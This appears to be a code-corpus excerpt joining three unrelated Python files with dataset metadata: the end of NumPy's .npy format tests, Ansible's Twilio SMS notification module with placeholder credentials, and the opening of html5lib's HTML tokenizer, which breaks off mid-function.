"F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>u8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<i8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<i8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>i8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>i8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<f4', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<f4', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>f4', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>f4', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<f8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<f8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>f8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>f8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<c8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<c8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>c8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>c8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<c16', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<c16', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>c16', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>c16', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': 'O', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': 'O', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 3)} \n"
"v\x00{'descr': [('x', '<i4', (2,)), ('y', '<f8', (2, 2)), ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n"
"\x16\x02{'descr': [('x', '<i4', (2,)),\n ('Info',\n [('value', '<c16'),\n ('y2', '<f8'),\n ('Info2',\n [('name', '|S2'),\n ('value', '<c16', (2,)),\n ('y3', '<f8', (2,)),\n ('z3', '<u4', (2,))]),\n ('name', '|S2'),\n ('z2', '|b1')]),\n ('color', '|S2'),\n ('info', [('Name', '<U8'), ('Value', '<c16')]),\n ('y', '<f8', (2, 2)),\n ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n"
"v\x00{'descr': [('x', '>i4', (2,)), ('y', '>f8', (2, 2)), ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n"
"\x16\x02{'descr': [('x', '>i4', (2,)),\n ('Info',\n [('value', '>c16'),\n ('y2', '>f8'),\n ('Info2',\n [('name', '|S2'),\n ('value', '>c16', (2,)),\n ('y3', '>f8', (2,)),\n ('z3', '>u4', (2,))]),\n ('name', '|S2'),\n ('z2', '|b1')]),\n ('color', '|S2'),\n ('info', [('Name', '>U8'), ('Value', '>c16')]),\n ('y', '>f8', (2, 2)),\n ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n"
'''
import sys
import os
import shutil
import tempfile
import warnings
from io import BytesIO
import numpy as np
from numpy.compat import asbytes, asbytes_nested, sixu
from numpy.testing import (
run_module_suite, assert_, assert_array_equal, assert_raises, raises,
dec, SkipTest
)
from numpy.lib import format
tempdir = None
# Module-level setup.
def setup_module():
global tempdir
tempdir = tempfile.mkdtemp()
def teardown_module():
global tempdir
if tempdir is not None and os.path.isdir(tempdir):
shutil.rmtree(tempdir)
tempdir = None
# Generate some basic arrays to test with.
scalars = [
np.uint8,
np.int8,
np.uint16,
np.int16,
np.uint32,
np.int32,
np.uint64,
np.int64,
np.float32,
np.float64,
np.complex64,
np.complex128,
object,
]
basic_arrays = []
for scalar in scalars:
for endian in '<>':
dtype = np.dtype(scalar).newbyteorder(endian)
basic = np.arange(1500).astype(dtype)
basic_arrays.extend([
# Empty
np.array([], dtype=dtype),
# Rank-0
np.array(10, dtype=dtype),
# 1-D
basic,
# 2-D C-contiguous
basic.reshape((30, 50)),
# 2-D F-contiguous
basic.reshape((30, 50)).T,
# 2-D non-contiguous
basic.reshape((30, 50))[::-1, ::2],
])
# More complicated record arrays.
# This is the structure of the table used for plain objects:
#
# +-+-+-+
# |x|y|z|
# +-+-+-+
# Structure of a plain array description:
Pdescr = [
('x', 'i4', (2,)),
('y', 'f8', (2, 2)),
('z', 'u1')]
# A plain list of tuples with values for testing:
PbufferT = [
# x y z
([3, 2], [[6., 4.], [6., 4.]], 8),
([4, 3], [[7., 5.], [7., 5.]], 9),
]
# This is the structure of the table used for nested objects (DON'T PANIC!):
#
# +-+---------------------------------+-----+----------+-+-+
# |x|Info |color|info |y|z|
# | +-----+--+----------------+----+--+ +----+-----+ | |
# | |value|y2|Info2 |name|z2| |Name|Value| | |
# | | | +----+-----+--+--+ | | | | | | |
# | | | |name|value|y3|z3| | | | | | | |
# +-+-----+--+----+-----+--+--+----+--+-----+----+-----+-+-+
#
# The corresponding nested array description:
Ndescr = [
('x', 'i4', (2,)),
('Info', [
('value', 'c16'),
('y2', 'f8'),
('Info2', [
('name', 'S2'),
('value', 'c16', (2,)),
('y3', 'f8', (2,)),
('z3', 'u4', (2,))]),
('name', 'S2'),
('z2', 'b1')]),
('color', 'S2'),
('info', [
('Name', 'U8'),
('Value', 'c16')]),
('y', 'f8', (2, 2)),
('z', 'u1')]
NbufferT = [
# x Info color info y z
# value y2 Info2 name z2 Name Value
# name value y3 z3
([3, 2], (6j, 6., ('nn', [6j, 4j], [6., 4.], [1, 2]), 'NN', True),
'cc', ('NN', 6j), [[6., 4.], [6., 4.]], 8),
([4, 3], (7j, 7., ('oo', [7j, 5j], [7., 5.], [2, 1]), 'OO', False),
'dd', ('OO', 7j), [[7., 5.], [7., 5.]], 9),
]
record_arrays = [
np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('<')),
np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('<')),
np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('>')),
np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('>')),
]
#BytesIO that reads a random number of bytes at a time
class BytesIOSRandomSize(BytesIO):
def read(self, size=None):
import random
size = random.randint(1, size)
return super(BytesIOSRandomSize, self).read(size)
def roundtrip(arr):
f = BytesIO()
format.write_array(f, arr)
f2 = BytesIO(f.getvalue())
arr2 = format.read_array(f2)
return arr2
def roundtrip_randsize(arr):
f = BytesIO()
format.write_array(f, arr)
f2 = BytesIOSRandomSize(f.getvalue())
arr2 = format.read_array(f2)
return arr2
def roundtrip_truncated(arr):
f = BytesIO()
format.write_array(f, arr)
#BytesIO is one byte short
f2 = BytesIO(f.getvalue()[0:-1])
arr2 = format.read_array(f2)
return arr2
def assert_equal_(o1, o2):
assert_(o1 == o2)
def test_roundtrip():
for arr in basic_arrays + record_arrays:
arr2 = roundtrip(arr)
yield assert_array_equal, arr, arr2
def test_roundtrip_randsize():
for arr in basic_arrays + record_arrays:
if arr.dtype != object:
arr2 = roundtrip_randsize(arr)
yield assert_array_equal, arr, arr2
def test_roundtrip_truncated():
for arr in basic_arrays:
if arr.dtype != object:
yield assert_raises, ValueError, roundtrip_truncated, arr
def test_long_str():
# check items larger than internal buffer size, gh-4027
long_str_arr = np.ones(1, dtype=np.dtype((str, format.BUFFER_SIZE + 1)))
long_str_arr2 = roundtrip(long_str_arr)
assert_array_equal(long_str_arr, long_str_arr2)
@dec.slow
def test_memmap_roundtrip():
# Fixme: test crashes nose on windows.
if not (sys.platform == 'win32' or sys.platform == 'cygwin'):
for arr in basic_arrays + record_arrays:
if arr.dtype.hasobject:
# Skip these since they can't be mmap'ed.
continue
# Write it out normally and through mmap.
nfn = os.path.join(tempdir, 'normal.npy')
mfn = os.path.join(tempdir, 'memmap.npy')
fp = open(nfn, 'wb')
try:
format.write_array(fp, arr)
finally:
fp.close()
fortran_order = (
arr.flags.f_contiguous and not arr.flags.c_contiguous)
ma = format.open_memmap(mfn, mode='w+', dtype=arr.dtype,
shape=arr.shape, fortran_order=fortran_order)
ma[...] = arr
del ma
# Check that both of these files' contents are the same.
fp = open(nfn, 'rb')
normal_bytes = fp.read()
fp.close()
fp = open(mfn, 'rb')
memmap_bytes = fp.read()
fp.close()
yield assert_equal_, normal_bytes, memmap_bytes
# Check that reading the file using memmap works.
ma = format.open_memmap(nfn, mode='r')
del ma
def test_compressed_roundtrip():
arr = np.random.rand(200, 200)
npz_file = os.path.join(tempdir, 'compressed.npz')
np.savez_compressed(npz_file, arr=arr)
arr1 = np.load(npz_file)['arr']
assert_array_equal(arr, arr1)
def test_python2_python3_interoperability():
if sys.version_info[0] >= 3:
fname = 'win64python2.npy'
else:
fname = 'python3.npy'
path = os.path.join(os.path.dirname(__file__), 'data', fname)
data = np.load(path)
assert_array_equal(data, np.ones(2))
def test_pickle_python2_python3():
# Test that loading object arrays saved on Python 2 works both on
# Python 2 and Python 3 and vice versa
data_dir = os.path.join(os.path.dirname(__file__), 'data')
if sys.version_info[0] >= 3:
xrange = range
else:
import __builtin__
xrange = __builtin__.xrange
expected = np.array([None, xrange, sixu('\u512a\u826f'),
asbytes('\xe4\xb8\x8d\xe8\x89\xaf')],
dtype=object)
for fname in ['py2-objarr.npy', 'py2-objarr.npz',
'py3-objarr.npy', 'py3-objarr.npz']:
path = os.path.join(data_dir, fname)
if (fname.endswith('.npz') and sys.version_info[0] == 2 and
sys.version_info[1] < 7):
# Reading object arrays directly from zipfile appears to fail
# on Py2.6, see cfae0143b4
continue
for encoding in ['bytes', 'latin1']:
if (sys.version_info[0] >= 3 and sys.version_info[1] < 4 and
encoding == 'bytes'):
# The bytes encoding is available starting from Python 3.4
continue
data_f = np.load(path, encoding=encoding)
if fname.endswith('.npz'):
data = data_f['x']
data_f.close()
else:
data = data_f
if sys.version_info[0] >= 3:
if encoding == 'latin1' and fname.startswith('py2'):
assert_(isinstance(data[3], str))
assert_array_equal(data[:-1], expected[:-1])
# mojibake occurs
assert_array_equal(data[-1].encode(encoding), expected[-1])
else:
assert_(isinstance(data[3], bytes))
assert_array_equal(data, expected)
else:
assert_array_equal(data, expected)
if sys.version_info[0] >= 3:
if fname.startswith('py2'):
if fname.endswith('.npz'):
data = np.load(path)
assert_raises(UnicodeError, data.__getitem__, 'x')
data.close()
data = np.load(path, fix_imports=False, encoding='latin1')
assert_raises(ImportError, data.__getitem__, 'x')
data.close()
else:
assert_raises(UnicodeError, np.load, path)
assert_raises(ImportError, np.load, path,
encoding='latin1', fix_imports=False)
def test_pickle_disallow():
data_dir = os.path.join(os.path.dirname(__file__), 'data')
path = os.path.join(data_dir, 'py2-objarr.npy')
assert_raises(ValueError, np.load, path,
allow_pickle=False, encoding='latin1')
path = os.path.join(data_dir, 'py2-objarr.npz')
f = np.load(path, allow_pickle=False, encoding='latin1')
assert_raises(ValueError, f.__getitem__, 'x')
path = os.path.join(tempdir, 'pickle-disabled.npy')
assert_raises(ValueError, np.save, path, np.array([None], dtype=object),
allow_pickle=False)
def test_version_2_0():
f = BytesIO()
# requires more than 2 byte for header
dt = [(("%d" % i) * 100, float) for i in range(500)]
d = np.ones(1000, dtype=dt)
format.write_array(f, d, version=(2, 0))
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
format.write_array(f, d)
assert_(w[0].category is UserWarning)
f.seek(0)
n = format.read_array(f)
assert_array_equal(d, n)
# 1.0 requested but data cannot be saved this way
assert_raises(ValueError, format.write_array, f, d, (1, 0))
def test_version_2_0_memmap():
# requires more than 2 byte for header
dt = [(("%d" % i) * 100, float) for i in range(500)]
d = np.ones(1000, dtype=dt)
tf = tempfile.mktemp('', 'mmap', dir=tempdir)
# 1.0 requested but data cannot be saved this way
assert_raises(ValueError, format.open_memmap, tf, mode='w+', dtype=d.dtype,
shape=d.shape, version=(1, 0))
ma = format.open_memmap(tf, mode='w+', dtype=d.dtype,
shape=d.shape, version=(2, 0))
ma[...] = d
del ma
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
ma = format.open_memmap(tf, mode='w+', dtype=d.dtype,
shape=d.shape, version=None)
assert_(w[0].category is UserWarning)
ma[...] = d
del ma
ma = format.open_memmap(tf, mode='r')
assert_array_equal(ma, d)
def test_write_version():
f = BytesIO()
arr = np.arange(1)
# These should pass.
format.write_array(f, arr, version=(1, 0))
format.write_array(f, arr)
format.write_array(f, arr, version=None)
format.write_array(f, arr)
format.write_array(f, arr, version=(2, 0))
format.write_array(f, arr)
# These should all fail.
bad_versions = [
(1, 1),
(0, 0),
(0, 1),
(2, 2),
(255, 255),
]
for version in bad_versions:
try:
format.write_array(f, arr, version=version)
except ValueError:
pass
else:
raise AssertionError("we should have raised a ValueError for the bad version %r" % (version,))
bad_version_magic = asbytes_nested([
'\x93NUMPY\x01\x01',
'\x93NUMPY\x00\x00',
'\x93NUMPY\x00\x01',
'\x93NUMPY\x02\x00',
'\x93NUMPY\x02\x02',
'\x93NUMPY\xff\xff',
])
malformed_magic = asbytes_nested([
'\x92NUMPY\x01\x00',
'\x00NUMPY\x01\x00',
'\x93numpy\x01\x00',
'\x93MATLB\x01\x00',
'\x93NUMPY\x01',
'\x93NUMPY',
'',
])
def test_read_magic():
s1 = BytesIO()
s2 = BytesIO()
arr = np.ones((3, 6), dtype=float)
format.write_array(s1, arr, version=(1, 0))
format.write_array(s2, arr, version=(2, 0))
s1.seek(0)
s2.seek(0)
version1 = format.read_magic(s1)
version2 = format.read_magic(s2)
assert_(version1 == (1, 0))
assert_(version2 == (2, 0))
assert_(s1.tell() == format.MAGIC_LEN)
assert_(s2.tell() == format.MAGIC_LEN)
def test_read_magic_bad_magic():
for magic in malformed_magic:
f = BytesIO(magic)
yield raises(ValueError)(format.read_magic), f
def test_read_version_1_0_bad_magic():
for magic in bad_version_magic + malformed_magic:
f = BytesIO(magic)
yield raises(ValueError)(format.read_array), f
def test_bad_magic_args():
assert_raises(ValueError, format.magic, -1, 1)
assert_raises(ValueError, format.magic, 256, 1)
assert_raises(ValueError, format.magic, 1, -1)
assert_raises(ValueError, format.magic, 1, 256)
def test_large_header():
s = BytesIO()
d = {'a': 1, 'b': 2}
format.write_array_header_1_0(s, d)
s = BytesIO()
d = {'a': 1, 'b': 2, 'c': 'x'*256*256}
assert_raises(ValueError, format.write_array_header_1_0, s, d)
def test_read_array_header_1_0():
s = BytesIO()
arr = np.ones((3, 6), dtype=float)
format.write_array(s, arr, version=(1, 0))
s.seek(format.MAGIC_LEN)
shape, fortran, dtype = format.read_array_header_1_0(s)
assert_((shape, fortran, dtype) == ((3, 6), False, float))
def test_read_array_header_2_0():
s = BytesIO()
arr = np.ones((3, 6), dtype=float)
format.write_array(s, arr, version=(2, 0))
s.seek(format.MAGIC_LEN)
shape, fortran, dtype = format.read_array_header_2_0(s)
assert_((shape, fortran, dtype) == ((3, 6), False, float))
def test_bad_header():
# header of length less than 2 should fail
s = BytesIO()
assert_raises(ValueError, format.read_array_header_1_0, s)
s = BytesIO(asbytes('1'))
assert_raises(ValueError, format.read_array_header_1_0, s)
# header shorter than indicated size should fail
s = BytesIO(asbytes('\x01\x00'))
assert_raises(ValueError, format.read_array_header_1_0, s)
# headers without the exact keys required should fail
d = {"shape": (1, 2),
"descr": "x"}
s = BytesIO()
format.write_array_header_1_0(s, d)
assert_raises(ValueError, format.read_array_header_1_0, s)
d = {"shape": (1, 2),
"fortran_order": False,
"descr": "x",
"extrakey": -1}
s = BytesIO()
format.write_array_header_1_0(s, d)
assert_raises(ValueError, format.read_array_header_1_0, s)
def test_large_file_support():
if (sys.platform == 'win32' or sys.platform == 'cygwin'):
raise SkipTest("Unknown if Windows has sparse filesystems")
# try creating a large sparse file
tf_name = os.path.join(tempdir, 'sparse_file')
try:
# seek past end would work too, but linux truncate somewhat
# increases the chances that we have a sparse filesystem and can
# avoid actually writing 5GB
import subprocess as sp
sp.check_call(["truncate", "-s", "5368709120", tf_name])
except:
raise SkipTest("Could not create 5GB large file")
# write a small array to the end
with open(tf_name, "wb") as f:
f.seek(5368709120)
d = np.arange(5)
np.save(f, d)
# read it back
with open(tf_name, "rb") as f:
f.seek(5368709120)
r = np.load(f)
assert_array_equal(r, d)
if __name__ == "__main__":
run_module_suite()
| gpl-3.0 | 71,527,679,412,550,640 | 39.75 | 565 | 0.473298 | false |
jcpowermac/ansible | lib/ansible/modules/notification/twilio.py | 47 | 5594 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2015, Matt Makai <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
version_added: "1.6"
module: twilio
short_description: Sends a text message to a mobile phone through Twilio.
description:
- Sends a text message to a phone number through the Twilio messaging API.
notes:
  - This module is non-idempotent because it sends a text message through the
external API. It is idempotent only in the case that the module fails.
- Like the other notification modules, this one requires an external
dependency to work. In this case, you'll need a Twilio account with
a purchased or verified phone number to send the text message.
options:
account_sid:
description:
      user's Twilio account SID found on the account page
required: true
auth_token:
description: user's Twilio authentication token
required: true
msg:
description:
the body of the text message
required: true
to_number:
description:
one or more phone numbers to send the text message to,
format +15551112222
required: true
from_number:
description:
the Twilio number to send the text message from, format +15551112222
required: true
media_url:
description:
a URL with a picture, video or sound clip to send with an MMS
(multimedia message) instead of a plain SMS
required: false
author: "Matt Makai (@makaimc)"
'''
EXAMPLES = '''
# send an SMS about the build status to (555) 303 5681
# note: replace account_sid and auth_token values with your credentials
# and you have to have the 'from_number' on your Twilio account
- twilio:
msg: All servers with webserver role are now configured.
account_sid: ACXXXXXXXXXXXXXXXXX
auth_token: ACXXXXXXXXXXXXXXXXX
from_number: +15552014545
to_number: +15553035681
delegate_to: localhost
# send an SMS to multiple phone numbers about the deployment
# note: replace account_sid and auth_token values with your credentials
# and you have to have the 'from_number' on your Twilio account
- twilio:
msg: This server configuration is now complete.
account_sid: ACXXXXXXXXXXXXXXXXX
auth_token: ACXXXXXXXXXXXXXXXXX
from_number: +15553258899
to_number:
- +15551113232
- +12025551235
- +19735559010
delegate_to: localhost
# send an MMS to a single recipient with an update on the deployment
# and an image of the results
# note: replace account_sid and auth_token values with your credentials
# and you have to have the 'from_number' on your Twilio account
- twilio:
msg: Deployment complete!
account_sid: ACXXXXXXXXXXXXXXXXX
auth_token: ACXXXXXXXXXXXXXXXXX
from_number: +15552014545
to_number: +15553035681
media_url: https://demo.twilio.com/logo.png
delegate_to: localhost
'''
# =======================================
# twilio module support methods
#
import json
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six.moves.urllib.parse import urlencode
from ansible.module_utils.urls import fetch_url
def post_twilio_api(module, account_sid, auth_token, msg, from_number,
to_number, media_url=None):
URI = "https://api.twilio.com/2010-04-01/Accounts/%s/Messages.json" \
% (account_sid,)
AGENT = "Ansible"
data = {'From': from_number, 'To': to_number, 'Body': msg}
if media_url:
data['MediaUrl'] = media_url
encoded_data = urlencode(data)
headers = {'User-Agent': AGENT,
'Content-type': 'application/x-www-form-urlencoded',
'Accept': 'application/json',
}
# Hack module params to have the Basic auth params that fetch_url expects
module.params['url_username'] = account_sid.replace('\n', '')
module.params['url_password'] = auth_token.replace('\n', '')
return fetch_url(module, URI, data=encoded_data, headers=headers)
# =======================================
# Main
#
def main():
module = AnsibleModule(
argument_spec=dict(
account_sid=dict(required=True),
auth_token=dict(required=True, no_log=True),
msg=dict(required=True),
from_number=dict(required=True),
to_number=dict(required=True),
media_url=dict(default=None, required=False),
),
supports_check_mode=True
)
account_sid = module.params['account_sid']
auth_token = module.params['auth_token']
msg = module.params['msg']
from_number = module.params['from_number']
to_number = module.params['to_number']
media_url = module.params['media_url']
if not isinstance(to_number, list):
to_number = [to_number]
for number in to_number:
r, info = post_twilio_api(module, account_sid, auth_token, msg,
from_number, number, media_url)
if info['status'] not in [200, 201]:
body_message = "unknown error"
if 'body' in info:
body = json.loads(info['body'])
body_message = body['message']
module.fail_json(msg="unable to send message to %s: %s" % (number, body_message))
module.exit_json(msg=msg, changed=False)
if __name__ == '__main__':
main()
| gpl-3.0 | -3,576,716,205,702,385,700 | 31.149425 | 93 | 0.652485 | false |
superchilli/webapp | venv/lib/python2.7/site-packages/html5lib/tokenizer.py | 1710 | 76929 | from __future__ import absolute_import, division, unicode_literals
try:
chr = unichr # flake8: noqa
except NameError:
pass
from collections import deque
from .constants import spaceCharacters
from .constants import entities
from .constants import asciiLetters, asciiUpper2Lower
from .constants import digits, hexDigits, EOF
from .constants import tokenTypes, tagTokenTypes
from .constants import replacementCharacters
from .inputstream import HTMLInputStream
from .trie import Trie
entitiesTrie = Trie(entities)
class HTMLTokenizer(object):
""" This class takes care of tokenizing HTML.
* self.currentToken
Holds the token that is currently being processed.
* self.state
Holds a reference to the method to be invoked... XXX
* self.stream
Points to HTMLInputStream object.
"""
def __init__(self, stream, encoding=None, parseMeta=True, useChardet=True,
lowercaseElementName=True, lowercaseAttrName=True, parser=None):
self.stream = HTMLInputStream(stream, encoding, parseMeta, useChardet)
self.parser = parser
# Perform case conversions?
self.lowercaseElementName = lowercaseElementName
self.lowercaseAttrName = lowercaseAttrName
# Setup the initial tokenizer state
self.escapeFlag = False
self.lastFourChars = []
self.state = self.dataState
self.escape = False
# The current token being created
self.currentToken = None
super(HTMLTokenizer, self).__init__()
def __iter__(self):
""" This is where the magic happens.
        We do our usual processing through the states and when we have a token
to return we yield the token which pauses processing until the next token
is requested.
"""
self.tokenQueue = deque([])
# Start processing. When EOF is reached self.state will return False
# instead of True and the loop will terminate.
while self.state():
while self.stream.errors:
yield {"type": tokenTypes["ParseError"], "data": self.stream.errors.pop(0)}
while self.tokenQueue:
yield self.tokenQueue.popleft()
def consumeNumberEntity(self, isHex):
"""This function returns either U+FFFD or the character based on the
decimal or hexadecimal representation. It also discards ";" if present.
        If it is not present, self.tokenQueue.append({"type": tokenTypes["ParseError"]}) is invoked.
"""
allowed = digits
radix = 10
if isHex:
allowed = hexDigits
radix = 16
charStack = []
# Consume all the characters that are in range while making sure we
# don't hit an EOF.
c = self.stream.char()
while c in allowed and c is not EOF:
charStack.append(c)
c = self.stream.char()
# Convert the set of characters consumed to an int.
charAsInt = int("".join(charStack), radix)
# Certain characters get replaced with others
if charAsInt in replacementCharacters:
char = replacementCharacters[charAsInt]
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"illegal-codepoint-for-numeric-entity",
"datavars": {"charAsInt": charAsInt}})
elif ((0xD800 <= charAsInt <= 0xDFFF) or
(charAsInt > 0x10FFFF)):
char = "\uFFFD"
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"illegal-codepoint-for-numeric-entity",
"datavars": {"charAsInt": charAsInt}})
else:
# Should speed up this check somehow (e.g. move the set to a constant)
if ((0x0001 <= charAsInt <= 0x0008) or
(0x000E <= charAsInt <= 0x001F) or
(0x007F <= charAsInt <= 0x009F) or
(0xFDD0 <= charAsInt <= 0xFDEF) or
charAsInt in frozenset([0x000B, 0xFFFE, 0xFFFF, 0x1FFFE,
0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE,
0x5FFFF, 0x6FFFE, 0x6FFFF, 0x7FFFE,
0x7FFFF, 0x8FFFE, 0x8FFFF, 0x9FFFE,
0x9FFFF, 0xAFFFE, 0xAFFFF, 0xBFFFE,
0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE,
0xFFFFF, 0x10FFFE, 0x10FFFF])):
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data":
"illegal-codepoint-for-numeric-entity",
"datavars": {"charAsInt": charAsInt}})
try:
                # Try/except needed as UCS-2 Python builds' unichr only works
# within the BMP.
char = chr(charAsInt)
except ValueError:
v = charAsInt - 0x10000
char = chr(0xD800 | (v >> 10)) + chr(0xDC00 | (v & 0x3FF))
# Discard the ; if present. Otherwise, put it back on the queue and
# invoke parseError on parser.
if c != ";":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"numeric-entity-without-semicolon"})
self.stream.unget(c)
return char
def consumeEntity(self, allowedChar=None, fromAttribute=False):
# Initialise to the default output for when no entity is matched
output = "&"
charStack = [self.stream.char()]
if (charStack[0] in spaceCharacters or charStack[0] in (EOF, "<", "&")
or (allowedChar is not None and allowedChar == charStack[0])):
self.stream.unget(charStack[0])
elif charStack[0] == "#":
# Read the next character to see if it's hex or decimal
hex = False
charStack.append(self.stream.char())
if charStack[-1] in ("x", "X"):
hex = True
charStack.append(self.stream.char())
# charStack[-1] should be the first digit
if (hex and charStack[-1] in hexDigits) \
or (not hex and charStack[-1] in digits):
# At least one digit found, so consume the whole number
self.stream.unget(charStack[-1])
output = self.consumeNumberEntity(hex)
else:
# No digits found
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "expected-numeric-entity"})
self.stream.unget(charStack.pop())
output = "&" + "".join(charStack)
else:
# At this point in the process might have named entity. Entities
# are stored in the global variable "entities".
#
# Consume characters and compare to these to a substring of the
# entity names in the list until the substring no longer matches.
while (charStack[-1] is not EOF):
if not entitiesTrie.has_keys_with_prefix("".join(charStack)):
break
charStack.append(self.stream.char())
# At this point we have a string that starts with some characters
# that may match an entity
# Try to find the longest entity the string will match to take care
